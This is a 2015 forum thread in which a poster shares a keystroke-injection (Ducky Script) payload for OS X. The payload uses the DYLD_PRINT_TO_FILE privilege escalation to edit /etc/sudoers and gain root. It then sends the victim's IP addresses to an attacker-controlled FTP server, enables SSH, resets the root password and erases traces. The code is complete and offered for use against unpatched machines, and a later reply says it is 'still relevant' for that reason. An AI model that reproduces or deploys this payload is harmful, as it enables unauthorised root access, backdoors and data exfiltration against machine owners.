V3sth4cks153 Posted July 26, 2015 (edited)

Hi everyone! Following my previous post on an adaptation of the recently discovered DYLD_PRINT_TO_FILE privilege escalation vulnerability, I decided to create a full use of this adaptation.

This payload exploits the DYLD_PRINT_TO_FILE privilege escalation in order to get root on a Mac. The payload then activates the ssh daemon, changes the root password to anything you want, and uploads a text file containing both the internal and external IP addresses of the victim to an ftp server of your choice. The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app. The attacker can then SSH or SFTP to the victim machine using the modified root password and the IP address in the text file.

/!\ MAKE SURE TO REPLACE THE FTP SERVER ADDRESS, USERNAME AND PASSWORD, AS WELL AS THE NEW ROOT PASSWORD WITH WHAT YOU WANT THEM TO BE! /!\

I hope you like it!

********************* USE THIS PAYLOAD AT YOUR OWN RISK! *********************

Here is the code (also on my GitHub):

REM Author: V3sth4cks153
REM Title: OS X DYLD_PRINT_TO_FILE Root SSH Backdoor
REM This payload exploits the DYLD_PRINT_TO_FILE Privilege Escalation in order to get root on a Mac.
REM The payload then activates the ssh daemon, changes the root password to anything you want, and uploads a text file containing both the internal and external IP addresses of the victim to an ftp server of your choice.
REM The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app.
REM
REM /!\ MAKE SURE TO REPLACE THE FTP SERVER ADDRESS, USERNAME AND PASSWORD, AS WELL AS THE NEW ROOT PASSWORD WITH WHAT YOU WANT THEM TO BE! /!\
REM
REM ********************* USE THIS AT YOUR OWN RISK *********************
REM
REM --------------- OPEN TERMINAL ---------------
DELAY 3000
GUI SPACE
DELAY 100
STRING Terminal
DELAY 500
ENTER
DELAY 1000
REM --------------- GO TO HOME DIRECTORY ---------------
STRING cd
ENTER
DELAY 100
REM --------------- ESCALATE PRIVS ---------------
REM newgrp is setuid root; dyld opens the DYLD_PRINT_TO_FILE target as fd 3, and the echo writes the sudoers rule through that fd
STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
ENTER
REM --------------- GET IP AND UPLOAD TO FTP ---------------
DELAY 200
STRING curl -s checkip.dyndns.org | sed -e 's/.*Current IP Address: //' -e 's/<.*$//' > ip.txt
ENTER
DELAY 1200
STRING ifconfig |grep inet >> ip.txt
ENTER
DELAY 500
STRING ftp SERVER_ADDRESS
ENTER
DELAY 500
STRING USERNAME
ENTER
DELAY 200
STRING PASSWORD
ENTER
DELAY 1000
STRING put ip.txt
ENTER
DELAY 1000
STRING exit
ENTER
DELAY 500
STRING rm ip.txt
ENTER
REM --------------- ENABLE SSH ---------------
STRING systemsetup -f -setremotelogin on
ENTER
REM --------------- CHANGE ROOT PASSWORD ---------------
STRING passwd
ENTER
STRING NEW_ROOT_PASSWORD
ENTER
DELAY 500
STRING NEW_ROOT_PASSWORD
ENTER
DELAY 1500
REM --------------- CLEANUP ---------------
REM the injected rule is the last line of /etc/sudoers, so delete it with visudo
STRING cd
ENTER
STRING visudo -f /etc/sudoers
ENTER
DELAY 500
STRING :$d
ENTER
STRING :w
ENTER
STRING :x
ENTER
STRING history -c
ENTER
DELAY 100
STRING exit
ENTER
STRING history -c
ENTER
GUI q

Edited July 26, 2015 by V3sth4cks153
V3sth4cks153 (Author) Posted August 28, 2015

The vulnerability has been patched in 10.10.5!
Matto Posted August 31, 2015

Sad news :'-(
V3sth4cks153 (Author) Posted August 31, 2015 (edited)

Sad news :'-(

Yeah! But there still are people who won't update for a long time! So it's still relevant...

Edited August 31, 2015 by V3sth4cks153